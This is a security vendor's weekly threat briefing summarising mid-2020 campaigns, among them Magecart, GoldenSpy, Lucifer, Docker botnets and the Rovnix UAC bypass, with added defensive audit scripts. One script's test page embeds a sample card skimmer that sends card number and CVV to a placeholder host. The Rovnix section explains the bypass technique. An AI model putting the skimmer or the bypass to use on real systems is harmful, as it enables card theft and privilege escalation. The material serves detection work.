
Weekly Threat Briefing: Backdoors, Magecart, Spearphishing, Ransomware and More

June 30, 2020 | Anomali Threat Research Team

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: Cryptojacking, Data Breach, Maze Ransomware, PII and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.


Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this briefing and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Warning—Apple Suddenly Catches TikTok Secretly Spying On Millions Of iPhone Users

(published: June 26, 2020)

iOS has long allowed any application to read the system pasteboard without asking the user or telling them that it happened. iOS 14 does not remove that access, but it adds a banner that notifies the user each time an app reads the pasteboard. With that banner in the iOS 14 beta, the Chinese social media app TikTok was observed reading users' clipboard contents. When the behaviour was first reported at the start of the year, TikTok attributed it to a third-party SDK and said it would stop using the library; the new iOS 14 notifications show the reads still occurring. It is also worth noting that, because of Apple's Universal Clipboard, text copied on a user's Mac or iPad can be read by apps on their iPhone.
Recommendation: iOS users should install iOS 14 and updated TikTok builds as soon as they are released. The banner is a notification, not a block: any installed app can still read the clipboard, which for many users holds passwords, one-time codes and other sensitive data. Clear the clipboard after pasting such values, and treat a clipboard-read banner from an app that has no reason to paste as a signal to remove it.
Tags: China, Clipboard, iOS 14, Spying, TikTok

US Local Government Services Targeted by New Magecart Credit Card Skimming Attack

(published: June 26, 2020)

Trend Micro researchers have analysed Magecart card-skimming campaigns targeting eight unnamed U.S. cities. The operators compromised city payment portals built on Click2Gov, a platform used by local governments for online payments such as utility bills and event registration, and planted skimmers that collect credit card numbers and Personally Identifiable Information (PII) from residents paying through the sites. Click2Gov deployments have repeatedly been targeted by card-skimming operations in the U.S.; five of the eight cities in this campaign had been hit before. There is no evidence yet linking those earlier campaigns to this one.
Recommendation: Organisations that take card payments online must defend the payment page itself, not only the back-end systems: a web skimmer runs in the customer's browser, so server-side controls never see the stolen data. Keep an inventory of every script loaded on checkout pages, pin third-party scripts with Subresource Integrity, restrict script and connection sources with a Content Security Policy, and monitor the pages for unexpected script changes. Stay current with PCI DSS and other applicable compliance requirements. In the case of compromise, rebuild affected systems from known-good sources rather than cleaning them in place, notify customers as soon as possible and consider offering fraud protection.
MITRE ATT&CK: [MITRE ATT&CK] Exfiltration Over Command and Control Channel - T1041 | [MITRE ATT&CK] Automated Collection - T1119
Tags: Magecart, Card Skimming, Click2Gov, U.S, PII
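The script-inventory check recommended above, as an added example (this is not code from the Trend Micro report or from Click2Gov): it parses a checkout page, flags external scripts from hosts outside an allowlist, flags approved third-party scripts that carry no Subresource Integrity hash, and flags inline scripts that both read card-field values and use a browser primitive that sends data off the page. The HTML, the hostnames and the allowlist are constructed for the example.

```python
"""Script inventory for a payment page: flags what a Magecart-style
skimmer typically introduces.  Added example, not code from the
Trend Micro report.  The HTML, hostnames and allowlist below are
constructed for illustration."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts the site owner has approved for loading scripts.
ALLOWED_SCRIPT_HOSTS = {"cdn.example.gov"}
# Field names a skimmer hooks; adjust to the real payment form.
CARD_FIELD_HINTS = ("cardnumber", "card_number", "ccnum", "cvv", "cvc", "expiry")
# Browser primitives used to move data off the page.
SEND_HINTS = ("fetch(", "xmlhttprequest", "new image(", "sendbeacon(", "websocket(")


class ScriptCollector(HTMLParser):
    """Collect external <script src> tags (with SRI hash) and inline bodies."""

    def __init__(self):
        super().__init__()
        self.external = []        # (src, integrity-or-None)
        self.inline = []          # inline script bodies
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], a.get("integrity")))
        else:
            self._in_inline = True
            self.inline.append("")

    def handle_data(self, data):
        if self._in_inline:
            self.inline[-1] += data       # body may arrive in several chunks

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def audit_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (severity, description) findings for one page."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src, integrity in p.external:
        host = urlparse(src).hostname
        if host is None:
            continue                      # relative URL: same origin as the page
        if host not in allowed_hosts:
            findings.append(("high", f"script from unapproved host {host}: {src}"))
        elif integrity is None:
            findings.append(("medium", f"approved third-party script without SRI: {src}"))
    for body in p.inline:
        low = body.lower()
        if any(h in low for h in CARD_FIELD_HINTS) and any(s in low for s in SEND_HINTS):
            findings.append(("high", "inline script reads card fields and sends data off-page"))
    return findings


# Constructed checkout page: one pinned library, one unpinned library,
# one script from an unknown host and one inline skimmer-like handler.
SAMPLE_PAGE = """
<html><body>
<form id="pay">
  <input name="cardNumber"><input name="cvv"><input name="expiry">
</form>
<script src="https://cdn.example.gov/jquery.min.js"
        integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://cdn.example.gov/checkout.js"></script>
<script src="https://stats-collector.example.net/s.js"></script>
<script>
  document.getElementById("pay").addEventListener("submit", function () {
    var d = document.querySelector("[name=cardNumber]").value + "|" +
            document.querySelector("[name=cvv]").value;
    new Image().src = "https://stats-collector.example.net/i.gif?q=" + btoa(d);
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    for sev, msg in audit_page(SAMPLE_PAGE):
        print(f"[{sev}] {msg}")
```

Run it against a saved copy of the live checkout page on a schedule and diff the findings: the high-value signal is not the first run but any change in the script set between runs, which is exactly what a skimmer injection looks like.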

Hackers Breach E27, Want "Donation" To Reveal Vulnerabilities

(published: June 26, 2020)

E27 is a media company that provides a forum for Asian technology startup news and information, as well as a member community for sharing ideas. An actor group calling itself "Korean Hackers" and "Team Johnwick" claims to have exfiltrated source code and data from the company. They then contacted E27 and asked for a "donation" in return for revealing the vulnerabilities they used.
Recommendation: Affected users should change their E27 password and, if it was reused, the password on every other account that shares it. The company should apply industry-standard defence in depth: keep servers on current, patched software; maintain hardening baselines that define the configuration each server needs for its business role; treat every device admitted under a Bring-Your-Own-Device (BYOD) policy as a potential liability; and never rely on a single security mechanism, so that controls are layered, redundant and fail safe.
Tags: E27, Data Breach, Korea, PII

Chinese Bank Forced Western Companies to Install Malware-laced Tax Software

(published: June 25, 2020)

Security researchers at Trustwave have determined that an unnamed Chinese bank required its corporate customers to install tax software that carries a backdoor, which Trustwave has named "GoldenSpy". Companies doing business through the bank were required to use "Intelligent Tax", developed by the Golden Tax Department of the Aisino Corporation, to pay taxes. The software does let companies pay taxes, but it also installs GoldenSpy with SYSTEM-level privileges. The backdoor lets unknown threat actors execute Windows commands remotely and upload or download further payloads. Known targets include two unnamed UK-based organisations, a software vendor and a large financial association. Trustwave has not attributed the deployment of GoldenSpy to a specific actor.
Recommendation: All applications should be vetted before installation on personal or work machines, and applications that request additional permissions or install extra services should be examined before those are granted. Software should be downloaded only from trusted vendors, free versions especially. Where a third party mandates an application, as the bank did here, run it on an isolated system with no access to the corporate network, and monitor that host for new services, scheduled tasks, accounts and outbound connections that the application's stated function does not explain.
MITRE ATT&CK: [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Create Account - T1136 | [MITRE PRE-ATT&CK] Upload, install, and configure software/tools - T1362
Tags: GoldenSpy, Backdoor, China

CryptoCore Group Steals $200 Million in Cryptocurrency

(published: June 25, 2020)

ClearSky analysts report that the group "CryptoCore", also tracked as "Dangerous Password" and "Leery Turtle", is believed to have stolen over $200 million in cryptocurrency from several exchanges over the past two years. The group is assessed to be Russian-speaking and to operate from Russia, Ukraine or Romania. ClearSky asserts that CryptoCore used spearphishing and social engineering against exchange employees in the US and Japan to gain a foothold and then deployed the credential-theft tool Mimikatz. From there the group went after password managers to extract crypto-wallet keys, moved laterally across the network and drained the cryptocurrency.
Recommendation: Spearphishing emails are a significant risk because the sender often appears legitimate; sometimes a colleague's mailbox is compromised and used to send them. Employee education is a primary defence: tell staff what information requests from managers and colleagues should look like, and whom to contact when they suspect they are being targeted. Because this group's goal was wallet keys held in password managers, protect those managers with multi-factor authentication and keep the keys to high-value wallets in cold storage or hardware wallets, where a stolen credential alone does not expose them.
Tags: CryptoCore, Cryptocurrency, Mimikatz, Phishing, Russia, Ukraine

LG Electronic Allegedly Hit By Maze Ransomware Attack

(published: June 25, 2020)

Operators of the Maze ransomware have reportedly accessed and compromised the network of the South Korean electronics manufacturer LG Electronics. How the operators gained access has not been clarified, but they claim to have collected over 40GB of data relating to ongoing projects with several U.S. companies, and released a screenshot of several files and emails taken from LG as proof. Although the infection vector at LG is unknown, Maze operators are known to use exposed Remote Desktop services to reach administrative accounts and steal information before encrypting.
Recommendation: Ransomware is a continually evolving threat. A comprehensive, tested backup solution and a business continuity plan are essential. If a usable backup is not available, check for a public decryptor before considering payment, and avoid payment wherever possible. Maze operators exfiltrate data before encrypting it, so backups restore operations but do not undo the leak; a Maze intrusion should be handled as a data breach as well as an outage. Report ransomware to law enforcement, who are working to track these actors and make ransom unprofitable.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Maze, Ransomware, LG Electronics

Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices

(published: June 24, 2020)

Researchers from Unit 42 have revealed that a new variant of the hybrid cryptojacking malware "Lucifer" is being used in campaigns that exploit a remote code execution vulnerability (CVE-2019-9081) in the Laravel Framework for initial access. Lucifer can launch Distributed Denial of Service (DDoS) attacks, execute arbitrary commands, communicate with its Command and Control (C2) server and drop XMRig on infected machines to mine Monero. To spread within a network it relies on several well-known critical vulnerabilities, including EternalBlue and EternalRomance, together with credential brute-forcing, and it creates backdoors on the hosts it reaches. Mined cryptocurrency and other collected information are sent back to the operators' infrastructure.
Recommendation: Lucifer relies heavily on vulnerabilities for which patches have been available for a long time, in some cases years. Ensure your company has patch-maintenance policies in place, particularly where Bring Your Own Device (BYOD) is allowed. Once a vulnerability has been reported in open sources, threat actors are likely to fold its exploitation into their operations, so review and apply patches as soon as possible. Because Lucifer also brute-forces credentials, enforce strong passwords and account lockout on any internet-exposed service.
MITRE ATT&CK: [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Registry Run Keys / Startup Folder - T1060 | [MITRE ATT&CK] Uncommonly Used Port - T1065 | [MITRE ATT&CK] Standard Application Layer Protocol - T1071 | [MITRE ATT&CK] Brute Force - T1110 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Endpoint Denial of Service - T1499
Tags: Lucifer, Cryptojacking, Windows, CVE-2014-6287, CVE-2017-0144, CVE-2017-0145, CVE-2017-8464, CVE-2017-10271, CVE-2018-20062, CVE-2018-1000861, CVE-2019-9081

New Ransomware Posing as COVID-19 Tracing App Targets Canada; ESET Offers Decryptor

(published: June 24, 2020)

A new Android ransomware named "CryCryptor" has been identified by ESET researchers. It masquerades as the official COVID-19 tracing app from Health Canada and was offered for download shortly after the Canadian government announced its own contact-tracing app. Once installed, CryCryptor requests access to files on the device and encrypts files on external storage, appending ".enc" to each. After encryption it drops a file named "readme_now.txt" in every directory that holds encrypted files. ESET was able to build a decryptor because of a bug in the app: the service that performs decryption is exported, so any other application on the device can start it. ESET's decryptor app simply launches the decryption routine built into the ransomware.
Recommendation: Mobile users should install apps only from official stores, be sceptical of apps that appear immediately after a government or vendor announcement, and review the permissions an app requests against what it needs. If compromised by CryCryptor, download the legitimate decryptor app published by ESET to recover your files.
Tags: CryCryptor, COVID-19, Canada, Mobile, Ransomware

Software Security Update for NVIDIA GPU Display Driver

(published: June 24, 2020)

NVIDIA has released a software security update for the NVIDIA GPU Display Driver and vGPU software. It addresses issues that may lead to denial of service, escalation of privileges or information disclosure.
Recommendation: Download and install the update from the NVIDIA Driver Downloads page, or for the vGPU software update, from the NVIDIA Licensing Portal.
Tags: NVIDIA, escalation of privileges, CVE-2020-5962, CVE-2020-5963, CVE-2020-5964, CVE-2020-5965, CVE-2020-5966, CVE-2020-5967, CVE-2020-5968, CVE-2020-59670, CVE-2020-5973

XORDDoS, Kaiji Botnet Malware Variants Target Exposed Docker Servers

(published: June 23, 2020)

Trend Micro researchers have detected two Linux-based botnet families, XORDDoS and Kaiji, targeting Docker servers. In addition to scanning for SSH (port 22) and Telnet (port 23), both now scan for port 2375, the conventional port for the Docker Engine API over plain TCP, which administrators can enable for remote management. When XORDDoS finds a server with the port exposed, it uses the API to instruct every container on the host to download and execute the malware. Kaiji takes a different approach: instead of infecting running containers, it deploys a new container that carries the malware. In both cases the goal is DDoS attacks on behalf of the botmaster.
Recommendation: By default the Docker daemon exposes its API only on a Unix domain socket that requires root or membership of the docker group. API access over TCP can be enabled, but on its own it is unencrypted and unauthenticated, and anyone who can reach the port effectively has root on the host. If TCP access is required, bind it to a management interface, enable the daemon's built-in TLS with client-certificate verification (tlsverify) or place an authenticating reverse proxy in front of it, and firewall ports 2375 and 2376 from the internet.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: DDoS, Botnet, Docker, Kaiji, XORDDoS
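A configuration check for the exposure these botnets scan for, as an added example (not code from the Trend Micro report or from Docker): it reads a daemon.json document and reports TCP listeners that are plaintext, that are encrypted but do not verify client certificates, or that claim tlsverify without the certificate paths. The two configurations are constructed; the keys used are the documented daemon.json options.

```python
"""Audit a Docker daemon.json for an exposed, unauthenticated Engine API,
the exposure XORDDoS and Kaiji scan for.  Added example, not from the Trend
Micro report.  The configurations below are constructed; the keys used
("hosts", "tls", "tlsverify", "tlscacert", "tlscert", "tlskey") are real
daemon.json options."""
import json
from urllib.parse import urlparse

ALL_INTERFACES = {"0.0.0.0", "::", ""}
CERT_KEYS = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(config_json):
    """Return (severity, message) findings for one daemon.json document."""
    cfg = json.loads(config_json)
    # If "hosts" is absent dockerd listens only on the local Unix socket.
    hosts = cfg.get("hosts", ["unix:///var/run/docker.sock"])
    tls = bool(cfg.get("tls", False))
    tls_verify = bool(cfg.get("tlsverify", False))
    findings = []
    for h in hosts:
        u = urlparse(h)
        if u.scheme in ("unix", "fd"):
            continue                      # local or systemd socket: not network-reachable
        if u.scheme != "tcp":
            findings.append(("low", f"unrecognised listener {h}"))
            continue
        where = f"{u.hostname or '0.0.0.0'}:{u.port}"
        exposed = (u.hostname or "") in ALL_INTERFACES
        if not tls and not tls_verify:
            findings.append(("critical", f"plaintext, unauthenticated API on {where}"
                             + (" (all interfaces)" if exposed else "")))
        elif not tls_verify:
            findings.append(("high", f"API on {where} is encrypted (tls) but does not verify "
                             "client certificates; anyone reaching the port is root"))
        else:
            missing = [k for k in CERT_KEYS if not cfg.get(k)]
            if missing:
                findings.append(("high", f"tlsverify on {where} but missing {', '.join(missing)}"))
            elif exposed:
                findings.append(("low", f"authenticated API on {where} bound to all interfaces; "
                                 "prefer a management address"))
    return findings


# Constructed: the setting the botnets look for.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed: encrypted but still open to anyone who can reach the port.
ENCRYPTED_ONLY_DAEMON_JSON = (
    '{"hosts": ["tcp://0.0.0.0:2376"], "tls": true, '
    '"tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}'
)

# Constructed: the corrected form, bound to a management address with
# client-certificate verification.
HARDENED_DAEMON_JSON = (
    '{"hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"], '
    '"tlsverify": true, "tlscacert": "/etc/docker/ca.pem", '
    '"tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}'
)

if __name__ == "__main__":
    for name, doc in (("weak", WEAK_DAEMON_JSON),
                      ("encrypted-only", ENCRYPTED_ONLY_DAEMON_JSON),
                      ("hardened", HARDENED_DAEMON_JSON)):
        print(name, audit_daemon_config(doc) or "no findings")
```

daemon.json is not the only place a listener can be configured: if the systemd unit starts dockerd with `-H` on its command line, a `hosts` key in daemon.json conflicts with it and the daemon refuses to start, so check the unit file and any drop-ins as well as the JSON.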

Oh, What A Boot-iful Mornin’

(published: June 23, 2020)

Researchers at Kaspersky have detected malspam distributing new versions of the Rovnix bootkit that add a UAC-bypass mechanism. Rovnix's source code leaked in 2013, and the author of these builds appears to be reusing it to turn Rovnix into a backdoor with "Trojan-Spy elements", including recording audio from the microphone. The UAC bypass is the "Mocking Trusted Directories" technique documented by Tenable in 2018. The malware creates the folder "C:\Windows \System32", with a space after "Windows", and copies into it wusa.exe, a Windows binary that auto-elevates and is vulnerable to DLL side-loading. Because of a bug in "GetLongPathNameW", the trailing space is stripped when the path is checked, so the elevation check sees a trusted binary in a trusted location and lets it elevate without any prompt; the attacker's DLL placed beside it is then loaded with elevated privileges.
Recommendation: Educate employees on the risks of opening attachments from unknown senders, and deploy anti-spam and antivirus products from trusted vendors. On the endpoint, this bypass leaves distinctive artefacts: a directory whose name is a trusted Windows path with trailing whitespace, and copies of auto-elevating system binaries such as wusa.exe outside System32. Alerting on file-creation and process-creation events that match either pattern catches the technique regardless of how the malware was delivered.
MITRE ATT&CK: [MITRE ATT&CK] Spearphishing Attachment - T1193 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Bootkit - T1067 | [MITRE ATT&CK] Bypass User Account Control - T1088 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] DLL Search Order Hijacking - T1038 | [MITRE ATT&CK] Audio Capture - T1123
Tags: Malspam, Rovnix, UAC bypass, Bootkit
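Detection logic for the artefacts described above, as an added example (not Kaspersky's or Tenable's code): it normalises each path the way GetLongPathNameW effectively does, by stripping trailing whitespace from directory components, and flags paths that only become a trusted Windows location after that normalisation, plus copies of wusa.exe anywhere other than the real System32. The event lines are constructed in a simplified "EventID|Image|TargetFilename" shape that mirrors Sysmon events 11 (file create) and 1 (process create); real Sysmon XML needs its own parser.

```python
"""Detection for the "mocking trusted directories" UAC bypass: a directory
named like a trusted Windows path but with trailing whitespace in a
component, and auto-elevating binaries copied outside their real location.
Added example, not Kaspersky's or Tenable's code.  Event lines are
constructed as "EventID|Image|TargetFilename" (Sysmon 11 = file create,
Sysmon 1 = process create)."""

TRUSTED_DIRS = (r"c:\windows", r"c:\program files", r"c:\program files (x86)")
# Auto-elevating binaries abused for this bypass; extend from your own telemetry.
AUTO_ELEVATE_BINARIES = {"wusa.exe"}
REAL_SYSTEM32 = r"c:\windows\system32"


def path_parts(path):
    """Split a Windows path into non-empty components."""
    return [p for p in path.replace("/", "\\").split("\\") if p != ""]


def is_mock_trusted_dir(path):
    """True if the directory part of `path` is a trusted location only after
    trailing whitespace is stripped from some component, i.e. a folder that
    GetLongPathNameW canonicalises to a trusted path but which is not that
    folder on disk."""
    dirs = path_parts(path)[:-1]
    if not any(p != p.rstrip() for p in dirs):
        return False
    cleaned = "\\".join(p.rstrip() for p in dirs).lower()
    return any(cleaned == t or cleaned.startswith(t + "\\") for t in TRUSTED_DIRS)


def analyze_events(lines):
    """Return (rule, path) findings over pipe-separated event lines."""
    findings = []
    for line in lines:
        event_id, image, target = (line.split("|") + ["", ""])[:3]
        # For file creates inspect the created file; otherwise the process image.
        path = target if event_id == "11" else image
        if is_mock_trusted_dir(path):
            findings.append(("mock_trusted_dir", path))
        if event_id == "11":
            parts = path_parts(target)
            if (parts and parts[-1].lower() in AUTO_ELEVATE_BINARIES
                    and "\\".join(parts[:-1]).lower() != REAL_SYSTEM32):
                findings.append(("auto_elevate_binary_copied", target))
    return findings


# Constructed sample: a dropper builds the mock directory, copies wusa.exe
# and a side-loaded DLL into it, then runs it; the last line is benign.
SAMPLE_EVENTS = [
    r"11|C:\Users\bob\AppData\Local\Temp\dropper.exe|C:\Windows \System32\wusa.exe",
    r"11|C:\Users\bob\AppData\Local\Temp\dropper.exe|C:\Windows \System32\helper.dll",
    r"1|C:\Windows \System32\wusa.exe|",
    r"11|C:\Windows\System32\svchost.exe|C:\Windows\System32\config\systemprofile\cache.dat",
]

if __name__ == "__main__":
    for rule, path in analyze_events(SAMPLE_EVENTS):
        print(f"{rule}: {path!r}")
```

The whitespace check is deliberately applied to every directory component, not just the one after the drive letter, because the same canonicalisation quirk applies at any depth under a trusted root.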

Hackers Using Google Analytics to Bypass Web Security and Steal Credit Cards

(published: June 23, 2020)

Attackers are abusing Google Analytics to quietly steal credit card data from compromised e-commerce sites. They inject skimming code into the sites and pair it with standard Google Analytics tracking code configured with their own tracking ID, so that payment details entered by customers are sent to Google's collection endpoint and land in the attackers' analytics account. Because most sites' Content Security Policies already allow google-analytics.com, the exfiltration succeeds even where a policy is enforced.
Recommendation: Keep all software up to date, do not install web applications and CMS components from untrusted sources, and protect administration panels with strong, unique passwords and multi-factor authentication. Review what your Content Security Policy actually allows: a policy that permits connections or image loads to an analytics collector permits exfiltration to it, so monitor the scripts on payment pages rather than relying on the policy alone.
Tags: CreditCards, Google-Analytics, E-commerce, Webskimming
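A policy check for the gap described above, as an added example (not code from the report): it parses a Content-Security-Policy header and reports each directive through which a skimmer could still reach a Google Analytics collection endpoint, applying the CSP fallback rules (fetch directives fall back to default-src, form-action does not). The two policies are constructed; the collector hostnames are Google Analytics' real measurement endpoints.

```python
"""Check whether a Content-Security-Policy still leaves the exfiltration
path described above: a skimmer shipping card data to Google Analytics
collection endpoints, which most policies allow.  Added example, not from
the report.  The policies below are constructed."""

COLLECTOR_HOSTS = {"www.google-analytics.com", "ssl.google-analytics.com"}


def parse_csp(header):
    """Split a CSP header into {directive: [source expressions]}."""
    policy = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if tokens:
            policy[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return policy


def source_allows(source, host):
    """Does one CSP source expression permit a request to `host`?"""
    if source in ("*", "https:", "http:"):
        return True                       # scheme-only sources allow any host
    if "://" in source:
        source = source.split("://", 1)[1]
    source = source.split("/", 1)[0].split(":", 1)[0]   # drop path and port
    if source.startswith("*."):
        return host.endswith(source[1:])
    return source == host


def exfil_channels(header, collectors=COLLECTOR_HOSTS):
    """Return (directive, reason) pairs, one per way a skimmer could still
    reach a collector host under this policy."""
    policy = parse_csp(header)
    channels = []
    # Fetch directives fall back to default-src when absent.
    for directive in ("connect-src", "img-src"):
        sources = policy.get(directive, policy.get("default-src"))
        if sources is None:
            channels.append((directive, "not set and no default-src: any host allowed"))
            continue
        hits = sorted(h for h in collectors if any(source_allows(s, h) for s in sources))
        if hits:
            channels.append((directive, "allows " + ", ".join(hits)))
    # form-action has no default-src fallback: absent means unrestricted.
    form = policy.get("form-action")
    if form is None:
        channels.append(("form-action", "not set: a form can be posted to any host"))
    elif any(source_allows(s, h) for s in form for h in collectors):
        channels.append(("form-action", "allows a collector host"))
    scripts = policy.get("script-src", policy.get("default-src", []))
    if "'unsafe-inline'" in scripts:
        channels.append(("script-src", "'unsafe-inline' lets an injected inline skimmer run"))
    return channels


# Constructed: the typical policy of a site that uses Google Analytics.
TYPICAL_CSP = ("default-src 'self'; "
               "script-src 'self' https://www.google-analytics.com; "
               "img-src 'self' https://www.google-analytics.com; "
               "connect-src 'self' https://www.google-analytics.com")

# Constructed: collectors removed from every exfil-capable directive.
STRICT_CSP = ("default-src 'none'; "
              "script-src 'self' https://www.google-analytics.com; "
              "img-src 'self'; connect-src 'self'; form-action 'self'")

if __name__ == "__main__":
    for name, csp in (("typical", TYPICAL_CSP), ("strict", STRICT_CSP)):
        print(name, exfil_channels(csp) or "no open channel to a collector")
```

The strict policy closes the channel, but it also stops the site's own analytics beacons, which is the point: a policy cannot allow Google Analytics for measurement and simultaneously deny it as an exfiltration sink. Where the collector must stay allowed, the controls that remain are script inventory, Subresource Integrity and change monitoring on the payment page.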
